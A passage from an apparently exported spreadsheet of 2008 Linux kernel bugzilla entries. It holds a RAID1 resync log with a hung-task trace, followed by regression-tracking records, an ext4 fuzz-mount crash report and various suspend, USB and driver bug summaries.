bind&lt;sdb8&gt; [ 87.712080] RAID1 conf printout: [ 87.712080] --- wd:1 rd:2 [ 87.712080] disk 0, wo:1, o:1, dev:sdb8 [ 87.712080] disk 1, wo:0, o:1, dev:sda8 [ 87.712080] md: delaying recovery of md4 until md2 has finished (they share one or more physical units) [ 87.712080] md: delaying recovery of md1 until md2 has finished (they share one or more physical units) [ 87.712080] md: delaying recovery of md2 until md0 has finished (they share one or more physical units) [ 87.712080] md: delaying recovery of md3 until md4 has finished (they share one or more physical units) [ 87.900003] Adding 506036k swap on /dev/sdb2. Priority:-2 extents:1 across:506036k [ 240.556317] md: md0: recovery done. [ 240.710287] md: delaying recovery of md4 until md2 has finished (they share one or more physical units) [ 240.710298] md: delaying recovery of md1 until md2 has finished (they share one or more physical units) [ 240.710304] md: recovery of RAID array md2 [ 240.710307] md: minimum _guaranteed_ speed: 1000 KB/sec/disk. [ 240.710310] md: using maximum available idle IO bandwidth (but not more than 200000 KB/sec) for recovery. [ 240.710313] md: using 128k window, over a total of 1003904 blocks. [ 240.715502] md: delaying recovery of md3 until md4 has finished (they share one or more physical units) [ 240.804984] RAID1 conf printout: [ 240.804984] --- wd:2 rd:2 [ 240.804984] disk 0, wo:0, o:1, dev:sdb1 [ 240.804984] disk 1, wo:0, o:1, dev:sda1 [ 281.893369] md: md2: recovery done. [ 282.006453] md: delaying recovery of md4 until md1 has finished (they share one or more physical units) [ 282.006453] md: recovery of RAID array md1 [ 282.006453] md: minimum _guaranteed_ speed: 1000 KB/sec/disk. [ 282.006453] md: using maximum available idle IO bandwidth (but not more than 200000 KB/sec) for recovery. [ 282.006453] md: using 128k window, over a total of 2008000 blocks. [ 282.016388] md: delaying recovery of md3 until md4 has finished (they share one or more physical units) [ 282.063957] RAID1 conf printout: [ 282.063963] --- wd:2 rd:2 [ 282.063966] disk 0, wo:0, o:1, dev:sdb6 [ 282.063968] disk 1, wo:0, o:1, dev:sda6 [ 367.944002] md: md1: recovery done. [ 368.044902] md: recovery of RAID array md4 [ 368.044902] md: minimum _guaranteed_ speed: 1000 KB/sec/disk. [ 368.044902] md: using maximum available idle IO bandwidth (but not more than 200000 KB/sec) for recovery. [ 368.044902] md: using 128k window, over a total of 470945344 blocks. [ 368.060025] md: delaying recovery of md3 until md4 has finished (they share one or more physical units) [ 368.123726] RAID1 conf printout: [ 368.123726] --- wd:2 rd:2 [ 368.123726] disk 0, wo:0, o:1, dev:sdb5 [ 368.123726] disk 1, wo:0, o:1, dev:sda5 [10513.008047] INFO: task md3_resync:7350 blocked for more than 120 seconds. [10513.008083] "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. [10513.008113] md3_resync D b2165ff8 0 7350 2 [10513.008117] f01f5260 00000046 30303630 b2165ff8 00000055 f01f53ec c180bfa0 00000000 [10513.008123] f7813c00 c0104364 00003593 00000000 f781360c f7813c00 ee19bf8c f788a1e8 [10513.008129] f781360c f7813c00 ee19bf8c f788a1e8 f893e6ad f8943e84 f8943e7b f781360c [10513.008134] Call Trace: [10513.008171] [&lt;c0104364&gt;] apic_timer_interrupt+0x28/0x30 [10513.008189] [&lt;f893e6ad&gt;] md_do_sync+0x238/0xa84 [md_mod] [10513.008212] [&lt;c013435a&gt;] ktime_get_ts+0x22/0x49 [10513.008218] [&lt;c013438e&gt;] ktime_get+0xd/0x21 [10513.008223] [&lt;c0119081&gt;] hrtick_start_fair+0xeb/0x12c [10513.008234] [&lt;c01df7cc&gt;] rb_insert_color+0x4c/0xad [10513.008244] [&lt;c0133c26&gt;] enqueue_hrtimer+0xc9/0xd4 [10513.008252] [&lt;c01341ee&gt;] hrtimer_start+0xf7/0x110 [10513.008261] [&lt;c011d36d&gt;] hrtick_set+0x8f/0xd8 [10513.008271] [&lt;c0131774&gt;] autoremove_wake_function+0x0/0x2d [10513.008281] [&lt;f8940d7c&gt;] md_thread+0x0/0xcd [md_mod] [10513.008293] [&lt;f8940e33&gt;] md_thread+0xb7/0xcd [md_mod] [10513.008303] [&lt;c011a567&gt;] complete+0x28/0x36 [10513.008310] [&lt;f8940d7c&gt;] md_thread+0x0/0xcd [md_mod] [10513.008320] [&lt;c01316b3&gt;] kthread+0x38/0x5d [10513.008323] [&lt;c013167b&gt;] kthread+0x0/0x5d [10513.008327] [&lt;c01044f3&gt;] kernel_thread_helper+0x7/0x10 [10513.008336] ======================= [19097.404003] md: md4: recovery done. [19097.630415] md: recovery of RAID array md3 [19097.630415] md: minimum _guaranteed_ speed: 1000 KB/sec/disk. [19097.630415] md: using maximum available idle IO bandwidth (but not more than 200000 KB/sec) for recovery. [19097.630415] md: using 128k window, over a total of 10008384 blocks. [19097.738087] RAID1 conf printout: [19097.738087] --- wd:2 rd:2 [19097.738087] disk 0, wo:0, o:1, dev:sdb8 [19097.738087] disk 1, wo:0, o:1, dev:sda8 [19423.284002] md: md3: recovery done. [19423.471230] RAID1 conf printout: [19423.471236] --- wd:2 rd:2 [19423.471239] disk 0, wo:0, o:1, dev:sdb7 [19423.471242] disk 1, wo:0, o:1, dev:sda7 I guess something strange is happening, right (because of the call trace)? Steps to reproduce: 1) Have a system with 2 SATA HDD's and several RAID1 MD partitions on them (synced); 2) Remove one of the drives and replace it with an empty (new) one; 3) Copy the partition table to the new drive and resync all RAID1 partitions (at once) Notes: I can reproduce this every time. I also tried to reproduce this on another simular system (an old P3-550 also with Debian 5.0-x86 + 2 HDD's) and it suffers from the same problem.</t>
  </si>
  <si>
    <t>2.6.27-rc xen pvops regression?</t>
  </si>
  <si>
    <t>2008-09-02 13:46 UTC</t>
  </si>
  <si>
    <t>2008-09-20 02:51 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc xen pvops regression? Submitter : Bernhard Schmidt &lt;berni@birkenwald.de&gt; Date : 2008-08-31 17:18 References : http://marc.info/?l=linux-kernel&amp;m=122020367015025&amp;w=4 Handled-By : Alex Nixon &lt;alex.nixon@citrix.com&gt; Handled-By : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression in 2.6.27 caused by commit bfc0f59</t>
  </si>
  <si>
    <t>commit bfc0f59</t>
  </si>
  <si>
    <t>2008-09-02 13:50 UTC</t>
  </si>
  <si>
    <t>2008-09-03 12:59 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in 2.6.27 caused by commit bfc0f59 Submitter : Larry Finger &lt;Larry.Finger@lwfinger.net&gt; Date : 2008-08-31 22:54 References : http://marc.info/?l=linux-kernel&amp;m=122022328705635&amp;w=4 Handled-By : Thomas Gleixner &lt;tglx@linutronix.de&gt; Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Handled-By : Andi Kleen &lt;andi@firstfloor.org&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>proc_dir_entry 'hdb' already registered on repeatedly mounting/umounting intentionally corrupted fs</t>
  </si>
  <si>
    <t>2.6.27-rc5, 2.6.27.4</t>
  </si>
  <si>
    <t>2008-09-03 17:31 UTC</t>
  </si>
  <si>
    <t>2009-01-11 09:44 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: qemu x86 Software Environment: minimal Debian sid (unstable) Problem Description: Hi, When repeatedly mounting, using and umounting (different) intentionally corrupted ext4 filesystems, I eventually hit the error "proc_dir_entry 'hdb' already registered". Please find below the output (most of which is dmesg) from that and a couple of the preceding mount/umount cycles. umount is done before the "***** zzuffing [...]" lines and mount after them. ---------- EXT4-fs error (device hdb): htree_dirblock_to_tree: bad entry in directory #164: inode out of bounds - offset=8560, inode=16805, rec_len=16, name_len=5 EXT4-fs error (device hdb): htree_dirblock_to_tree: bad entry in directory #164: inode out of bounds - offset=8560, inode=16805, rec_len=16, name_len=5 EXT4-fs error (device hdb): htree_dirblock_to_tree: bad entry in directory #164: inode out of bounds - offset=8560, inode=16805, rec_len=16, name_len=5 EXT4-fs warning (device hdb): empty_dir: bad directory (dir #1289) - no `.' or `..' EXT4-fs error (device hdb): mb_free_blocks: double-free of inode 1318's block 2179(bit 2178 in group 0) EXT4-fs error (device hdb): mb_free_blocks: double-free of inode 1318's block 2180(bit 2179 in group 0) EXT4-fs error (device hdb): mb_free_blocks: double-free of inode 1318's block 2181(bit 2180 in group 0) EXT4-fs error (device hdb): mb_free_blocks: double-free of inode 1318's block 2182(bit 2181 in group 0) EXT4-fs error (device hdb): htree_dirblock_to_tree: bad entry in directory #1363: rec_len % 4 != 0 - offset=24, inode=1364, rec_len=21, name_len=9 EXT4-fs error (device hdb): empty_dir: bad entry in directory #1363: rec_len % 4 != 0 - offset=24, inode=1364, rec_len=21, name_len=9 EXT4-fs error (device hdb): mb_free_blocks: double-free of inode 0's block 9871(bit 1678 in group 1) EXT4-fs: mballoc: 0 blocks 0 reqs (0 success) EXT4-fs: mballoc: 0 extents scanned, 0 goal hits, 0 2^N hits, 0 breaks, 0 lost EXT4-fs: mballoc: 2 generated and it took 4642686 EXT4-fs: mballoc: 0 preallocated, 0 discarded ***** zzuffing ***** seed 175 kjournald2 starting. Commit interval 5 seconds EXT4 FS on hdb, internal journal EXT4-fs: mounted filesystem with ordered data mode. EXT4-fs: delayed allocation enabled EXT4-fs: file extents enabled EXT4-fs: mballoc enabled EXT4-fs: mballoc: 0 blocks 0 reqs (0 success) EXT4-fs: mballoc: 0 extents scanned, 0 goal hits, 0 2^N hits, 0 breaks, 0 lost EXT4-fs: mballoc: 2 generated and it took 206856 EXT4-fs: mballoc: 0 preallocated, 0 discarded ***** zzuffing ***** seed 176 kjournald2 starting. Commit interval 5 seconds EXT4 FS on hdb, internal journal EXT4-fs: mounted filesystem with ordered data mode. EXT4-fs: delayed allocation enabled EXT4-fs: file extents enabled EXT4-fs: mballoc enabled EXT4-fs: mballoc: 0 blocks 0 reqs (0 success) EXT4-fs: mballoc: 0 extents scanned, 0 goal hits, 0 2^N hits, 0 breaks, 0 lost EXT4-fs: mballoc: 2 generated and it took 202212 EXT4-fs: mballoc: 0 preallocated, 0 discarded ***** zzuffing ***** seed 177 jbd2_journal_bmap: journal block not found at offset 0 on hdb jbd2_journal_init_inode: Cannnot locate journal superblock EXT4-fs: Could not load journal inode mount: wrong fs type, bad option, bad superblock on /dev/hdb, missing codepage or helper program, or other error In some cases useful info is found in syslog - try dmesg | tail or so umount: /mnt: not mounted ***** zzuffing ***** seed 178 proc_dir_entry 'hdb' already registered Pid: 981, comm: mount Not tainted 2.6.27-rc5 #2 [&lt;c0543808&gt;] ? printk+0x18/0x20 [&lt;c0299f3a&gt;] proc_register+0x186/0x1b0 [&lt;c029a11d&gt;] proc_mkdir_mode+0x33/0x4a [&lt;c029a143&gt;] proc_mkdir+0xf/0x11 [&lt;c031fc2d&gt;] jbd2_stats_proc_init+0x27/0x74 [&lt;c0462ecd&gt;] ? __spin_lock_init+0x2c/0x4f [&lt;c0320632&gt;] jbd2_journal_init_inode+0x72/0x11b [&lt;c02ff99a&gt;] ext4_get_journal+0x37/0xae [&lt;c0301e0e&gt;] ext4_fill_super+0x1659/0x2133 [&lt;c029e1ec&gt;] ? disk_name+0xa7/0xb2 [&lt;c026646c&gt;] get_sb_bdev+0xed/0x121 [&lt;c027a667&gt;] ? alloc_vfsmnt+0x7d/0xf7 [&lt;c024dbb0&gt;] ? kstrdup+0x26/0x42 [&lt;c02fee16&gt;] ext4_get_sb+0x21/0x27 [&lt;c03007b5&gt;] ? ext4_fill_super+0x0/0x2133 [&lt;c0265447&gt;] vfs_kern_mount+0x3a/0x8b [&lt;c02654e2&gt;] do_kern_mount+0x33/0xbd [&lt;c027a286&gt;] do_new_mount+0x59/0x77 [&lt;c027af37&gt;] do_mount+0x195/0x1c0 [&lt;c0248f0b&gt;] ? __get_free_pages+0x29/0x2f [&lt;c0279272&gt;] ? copy_mount_options+0x2e/0x120 [&lt;c027afdd&gt;] sys_mount+0x7b/0xae [&lt;c0202f3e&gt;] syscall_call+0x7/0xb ======================= kjournald2 starting. Commit interval 5 seconds EXT4 FS on hdb, internal journal EXT4-fs: mounted filesystem with ordered data mode. EXT4-fs: delayed allocation enabled EXT4-fs: file extents enabled EXT4-fs: mballoc enabled EXT4-fs: mballoc: 0 blocks 0 reqs (0 success) EXT4-fs: mballoc: 0 extents scanned, 0 goal hits, 0 2^N hits, 0 breaks, 0 lost EXT4-fs: mballoc: 2 generated and it took 198981 EXT4-fs: mballoc: 0 preallocated, 0 discarded ***** zzuffing ***** seed 179 proc_dir_entry 'hdb' already registered Pid: 1227, comm: mount Not tainted 2.6.27-rc5 #2 [...] ----------</t>
  </si>
  <si>
    <t>Haute Secure claims they found "infection" on http://bugzilla.kernel.org/attachment.cgi</t>
  </si>
  <si>
    <t>Opera</t>
  </si>
  <si>
    <t>2008-09-04 01:06 UTC</t>
  </si>
  <si>
    <t>Rafał Miłecki</t>
  </si>
  <si>
    <t>2008-09-22 09:55 UTC</t>
  </si>
  <si>
    <t>Opera browser uses Haute Secure for checking security of visited sites. For some reason Haute Secure finds this bugzilla as infected site: http://hautesecure.com/opera_siteinfo.aspx?i=http://bugzilla.kernel.org/attachment.cgi On mentioned site there is a link for site owner to report suspected site as "not a bad site". Would be nice to talk with theses guys what they mean.</t>
  </si>
  <si>
    <t>/proc/net bug related to selinux</t>
  </si>
  <si>
    <t>commit fbb16e243887332dd5754e48ffe5b963378f3cd2</t>
  </si>
  <si>
    <t>2008-09-04 14:42 UTC</t>
  </si>
  <si>
    <t>2010-09-02 20:00 UTC</t>
  </si>
  <si>
    <t>Subject : linux-next: Tree for September 3 Submitter : Andrew Morton &lt;akpm@linux-foundation.org&gt; Date : 2008-09-04 17:45 References : http://marc.info/?l=linux-kernel&amp;m=122055041313270&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>fujitsu-laptop: fix regression for P8010 in 2.6.27-rc</t>
  </si>
  <si>
    <t>2008-09-04 14:51 UTC</t>
  </si>
  <si>
    <t>2008-09-06 15:13 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] fujitsu-laptop: fix regression for P8010 in 2.6.27-rc Submitter : Jonathan Woithe &lt;jwoithe@physics.adelaide.edu.au&gt; Date : 2008-08-29 1:48 References : http://marc.info/?l=linux-acpi&amp;m=121997379118705&amp;w=4 Handled-By : Jonathan Woithe &lt;jwoithe@physics.adelaide.edu.au&gt; Patch : http://marc.info/?l=linux-acpi&amp;m=121997379118705&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>oltp ~10% regression with 2.6.27-rc5 on stoakley machine</t>
  </si>
  <si>
    <t>2008-09-04 15:14 UTC</t>
  </si>
  <si>
    <t>2008-11-16 10:54 UTC</t>
  </si>
  <si>
    <t>Subject : oltp ~10% regression with 2.6.27-rc5 on stoakley machine Submitter : Lin Ming &lt;ming.m.lin@intel.com&gt; Date : 2008-09-04 7:06 References : http://marc.info/?l=linux-kernel&amp;m=122051202202373&amp;w=4 Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Handled-By : Gregory Haskins &lt;ghaskins@novell.com&gt; Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>oops during unmount - ext3? (2.6.27-rc5)</t>
  </si>
  <si>
    <t>2008-09-04 15:22 UTC</t>
  </si>
  <si>
    <t>2008-10-02 12:50 UTC</t>
  </si>
  <si>
    <t>Subject : oops during unmount - ext3? (2.6.27-rc5) Submitter : Marcin Slusarz &lt;marcin.slusarz@gmail.com&gt; Date : 2008-09-04 19:14 References : http://marc.info/?l=linux-kernel&amp;m=122055573123449&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>usb: sometimes dead keyboard after boot</t>
  </si>
  <si>
    <t>2008-09-04 16:11 UTC</t>
  </si>
  <si>
    <t>2008-09-27 10:09 UTC</t>
  </si>
  <si>
    <t>Subject : usb: sometimes dead keyboard after boot Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 26/08/08 21:03 References : http://marc.info/?l=linux-kernel&amp;m=121977815018224&amp;w=2 http://marc.info/?l=linux-kernel&amp;m=122011061109970&amp;w=2 http://marc.info/?l=linux-kernel&amp;m=122015125122679&amp;w=2 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NIC sis 191 don't work on kernel x86_64</t>
  </si>
  <si>
    <t>2008-09-05 05:47 UTC</t>
  </si>
  <si>
    <t>2012-10-30 16:04 UTC</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #9467 +++ Most recent kernel where this bug did not occur: Distribution: kernel 2.6.24 + 64 bits Hardware Environment: NIC integrated on mainboard SIS Software Environment: Caixa Mágica 12 + 64 bits Pro</t>
  </si>
  <si>
    <t>HPT374 detection crash with 74811f355f4f69a187fa74892dcf2a684b84ce99</t>
  </si>
  <si>
    <t>2008-09-06 14:42 UTC</t>
  </si>
  <si>
    <t>2008-09-12 12:39 UTC</t>
  </si>
  <si>
    <t>Subject : HPT374 detection crash with 74811f355f4f69a187fa74892dcf2a684b84ce99 Submitter : "Masoud Sharbiani" &lt;masouds@masoud.ir&gt; Date : 2008-09-04 23:11 References : http://marc.info/?l=linux-kernel&amp;m=122056994113818&amp;w=4 Handled-By : Masoud Sharbiani &lt;masouds@google.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122072163527041&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>sort-of regression due to "kconfig: speed up all*config + randconfig"</t>
  </si>
  <si>
    <t>commit f443d2eccf077afd8a839cc7ed66cc4d520c5f05</t>
  </si>
  <si>
    <t>2008-09-06 14:50 UTC</t>
  </si>
  <si>
    <t>2008-10-26 11:40 UTC</t>
  </si>
  <si>
    <t>Subject : sort-of regression due to "kconfig: speed up all*config + randconfig" Submitter : Alexey Dobriyan &lt;adobriyan@gmail.com&gt; Date : 2008-09-05 22:50 References : http://marc.info/?l=linux-kernel&amp;m=122065498013858&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>severe performance degradation on x86_64 going from 2.6.26-rc9 -&gt; 2.6.27-rc5</t>
  </si>
  <si>
    <t>2008-09-07 13:59 UTC</t>
  </si>
  <si>
    <t>Jason Vas Dias</t>
  </si>
  <si>
    <t>2009-04-30 12:59 UTC</t>
  </si>
  <si>
    <t>11651 11719</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26-rc9 (git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux-2.6.git @2008-07-10) Earliest failing kernel version: 2.6.27-rc9 (git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux-2.6.git @2008-09-07) Distribution: Gentoo / my Own + Fedora 10 Hardware Environment: x86_64 AMD Turion TL-64 64-bit dual core Software Environment: gcc-4.2.4 , glibc-2.8.90, both latest from savannah CVS @ 2008-07-10 Problem Description: After my monthly kernel update ( git-pull from Linus' tree + build ) the whole machine started crawling instead of sprinting - this was on my "own distro" (originally Gentoo based). Updating Fedora 10 from 2.6.26-0.115.rc9.git2.fc10 to 2.6.27-0.305.rc5.git6.fc10 had the same effect on a bog-standard Fedora 10 installation. Before I get out the toolbox and start investigating in-depth (which I don't really have time to do at the moment), I thought I'd check here first if anyone has seen this issue and if there is any quick configuration / boot arg fix ? To quantify, normally boot-up takes less than 1 minute with the 2.6.26 kernel; with the 2.6.27 kernel, it takes over 10 minutes, and the screen is flooded with these "hub event change" messages - and the terminal scrolls visibly slowly, and seems to be unable to keep up with even my extremely slow typing rate. I'm attaching the config-2.6.26-rc9.jvd and config-2.6.27-rc5.jvd files, and klogd logs from a bootup of each kernel. Any advice suggestions as to how to fix would be gratefully received. Steps to reproduce: build and install latest kernel from Linus' tree.</t>
  </si>
  <si>
    <t>eeepc_laptop hwmon missing name</t>
  </si>
  <si>
    <t>2008-09-08 04:58 UTC</t>
  </si>
  <si>
    <t>Florian Heimgaertner</t>
  </si>
  <si>
    <t>2008-10-10 00:41 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: EeePC Problem Description: The hwmon sysfs-interface of the eeepc_laptop module doesn't provide the mandatory attribute "name", causing lm-sensors to ignore it.</t>
  </si>
  <si>
    <t>Tomas Winkler</t>
  </si>
  <si>
    <t>MCE on Athlon64 X2, nForce4 motherboard</t>
  </si>
  <si>
    <t>2008-09-09 12:27 UTC</t>
  </si>
  <si>
    <t>2009-05-18 16:47 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.27-rc5 Distribution: Ubuntu 8.10 Hardware Environment: Athlon64 X2, nForce4 motherboard Problem Description: i can't boot, the kernel print a big amount of errors and then the watchdog reboots the machine. the only thing i can read are mce_panic, do_machine_check Steps to reproduce: boot, start X, wait 2 or 3 seconds</t>
  </si>
  <si>
    <t>Patrick McLean</t>
  </si>
  <si>
    <t>build issue #565 for v2.6.27-rc5 : undefined reference to `ei_interrupt' in hp-plus.c</t>
  </si>
  <si>
    <t>2008-09-12 10:53 UTC</t>
  </si>
  <si>
    <t>2008-09-16 22:06 UTC</t>
  </si>
  <si>
    <t>Subject : build issue #565 for v2.6.27-rc5 : undefined reference to `ei_interrupt' in hp-plus.c Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-09-07 13:19 References : http://marc.info/?l=linux-kernel&amp;m=122079361508022&amp;w=4 Handled-By : "Randy.Dunlap" &lt;rdunlap@xenotime.net&gt; Patch : http://marc.info/?l=linux-next&amp;m=122038632306156&amp;w=2 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc5 acpi: EC Storm error message on bootup</t>
  </si>
  <si>
    <t>2008-09-12 11:12 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc5 acpi: EC Storm error message on bootup Submitter : jmerkey@wolfmountaingroup.com Date : 2008-09-02 21:27 References : http://marc.info/?l=linux-kernel&amp;m=122039255517586&amp;w=4 Handled-By : Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122098180019264&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>pnp: Huge number of "io resource overlap" messages</t>
  </si>
  <si>
    <t>commit 999ed65ad12e374d7445fbc13f5a1d146ae4b0da</t>
  </si>
  <si>
    <t>2008-09-12 11:16 UTC</t>
  </si>
  <si>
    <t>2009-03-07 17:18 UTC</t>
  </si>
  <si>
    <t>Subject : [bisected][resend] pnp: Huge number of "io resource overlap" messages Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 2008-09-09 10:50 References : http://marc.info/?l=linux-kernel&amp;m=122095745403793&amp;w=4 Handled-By : Rene Herman &lt;rene.herman@keyaccess.nl&gt; Handled-By : Bjorn Helgaas &lt;bjorn.helgaas@hp.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122098498125536&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Disabling IRQ #23</t>
  </si>
  <si>
    <t>2008-09-12 11:26 UTC</t>
  </si>
  <si>
    <t>2008-09-27 10:27 UTC</t>
  </si>
  <si>
    <t>Subject : Disabling IRQ #23 Submitter : "Justin Mattock" &lt;justinmattock@gmail.com&gt; Date : 2008-09-09 19:08 References : http://marc.info/?l=linux-kernel&amp;m=122098735230906&amp;w=4 References : http://marc.info/?l=linux-kernel&amp;m=122107367715361&amp;w=4 Handled-By : "Yinghai Lu" &lt;yhlu.kernel@gmail.com&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Partition check considered as error is breaking mounting in 2.6.27</t>
  </si>
  <si>
    <t>2008-09-12 11:36 UTC</t>
  </si>
  <si>
    <t>2008-10-12 04:43 UTC</t>
  </si>
  <si>
    <t>Subject : Partition check considered as error is breaking mounting in 2.6.27 Submitter : Herton Ronaldo Krzesinski &lt;herton@mandriva.com.br&gt; Date : 2008-09-12 16:56 References : http://marc.info/?l=linux-kernel&amp;m=122123862519434&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>rmmod ide-cd_mod: tried to init an initialized  object, something is seriously wrong.</t>
  </si>
  <si>
    <t>2.6.27-rc5-00132-gb380b0d</t>
  </si>
  <si>
    <t>2008-09-12 11:55 UTC</t>
  </si>
  <si>
    <t>2008-09-26 16:10 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc5-mm1: rmmod ide-cd_mod: tried to init an initialized object, something is seriously wrong. Submitter : Mariusz Kozlowski &lt;m.kozlowski@tuxland.pl&gt; Date : 2008-07-16 2:22 References : http://marc.info/?l=linux-ide&amp;m=122061839713526&amp;w=4 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122095622602315&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>e100: PCI wake-up handling rework causes "Error clearing wake event"</t>
  </si>
  <si>
    <t>commit eb9d0fe40e313c0a74115ef456a2e43a6c8da72f</t>
  </si>
  <si>
    <t>2008-09-12 12:00 UTC</t>
  </si>
  <si>
    <t>2008-09-20 08:35 UTC</t>
  </si>
  <si>
    <t>Subject : e100: PCI wake-up handling rework causes "Error clearing wake event" Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 2008-09-09 6:12 References : http://marc.info/?l=linux-netdev&amp;m=122094080712131&amp;w=4 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122096638020191&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc6: nohz + s2ram = need to press keys to get progress</t>
  </si>
  <si>
    <t>2008-09-12 12:09 UTC</t>
  </si>
  <si>
    <t>2008-09-21 12:56 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc6: nohz + s2ram = need to press keys to get progress Submitter : Pavel Machek &lt;pavel@suse.cz&gt; Date : 2008-09-12 8:31 References : http://marc.info/?l=linux-kernel&amp;m=122121384705262&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[REGRESSION] 2.6.26.4 killed Suspend to RAM at my laptop</t>
  </si>
  <si>
    <t>2.6.27 started with 2.6.26.4</t>
  </si>
  <si>
    <t>2008-09-13 01:13 UTC</t>
  </si>
  <si>
    <t>2008-11-25 11:15 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.3 Earliest failing kernel version: Distribution: Debian testing Hardware Environment: Pentium M Software Environment: Debian testing, vanilla 2.6.26.4 Problem Description: in 2.6.26.3 suspend to RAM worked correctly, with 2.6.26.4 laptop just switch off LCD light, but remains working - can reboot it with (ctrl-alt-del) Steps to reproduce: Boot kernel try suspend</t>
  </si>
  <si>
    <t>2.6.26.5</t>
  </si>
  <si>
    <t>Johannes Engel</t>
  </si>
  <si>
    <t>nsc-ircc works only when restarting from Windows</t>
  </si>
  <si>
    <t>2008-09-14 03:10 UTC</t>
  </si>
  <si>
    <t>2012-05-22 13:59 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Distribution: Ubuntu Hardware Environment: Acer Extensa 5220 Problem Description: When I start my notebook from powered off, irdadump shows no responses to the queries. After booting XP and rebooting, irda works. Steps to reproduce: 1. Power off completely. 2. Boot Linux. 3. Irda does not work. 4. Reboot into windows. 5. Reboot into Linux. 6. Irda works. I will attach a diff of the output of lspci -vvxxxx before and after booting XP. I will also attach a diff of the dmesg outputs.</t>
  </si>
  <si>
    <t>spontaneous reboot on resume with 2.6.27</t>
  </si>
  <si>
    <t>2008-09-14 20:00 UTC</t>
  </si>
  <si>
    <t>Andy Wettstein</t>
  </si>
  <si>
    <t>2008-10-22 22:22 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.5 Earliest failing kernel version: 2.6.27-rc2 (haven't tested earlier versions) Distribution: Debian unstable Hardware Environment: MSI AMD Socket 754 with VIA K8T800 and AMI BIOS Software Environment: Problem Description: Resume from S3 causes machine to reset itself. Steps to reproduce: Enter S3 with "echo mem &gt; /sys/power/state" Try to resume.</t>
  </si>
  <si>
    <t>Panic stop CPUs regression</t>
  </si>
  <si>
    <t>2008-09-14 21:59 UTC</t>
  </si>
  <si>
    <t>2010-10-07 18:40 UTC</t>
  </si>
  <si>
    <t>Subject : Don't complain about disabled irqs when the system has paniced Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2008-09-02 13:49 References : http://marc.info/?l=linux-kernel&amp;m=122036356127282&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ath9k lose connection</t>
  </si>
  <si>
    <t>last git (2.6.27-rc6+)</t>
  </si>
  <si>
    <t>2008-09-15 01:50 UTC</t>
  </si>
  <si>
    <t>2008-09-24 07:25 UTC</t>
  </si>
  <si>
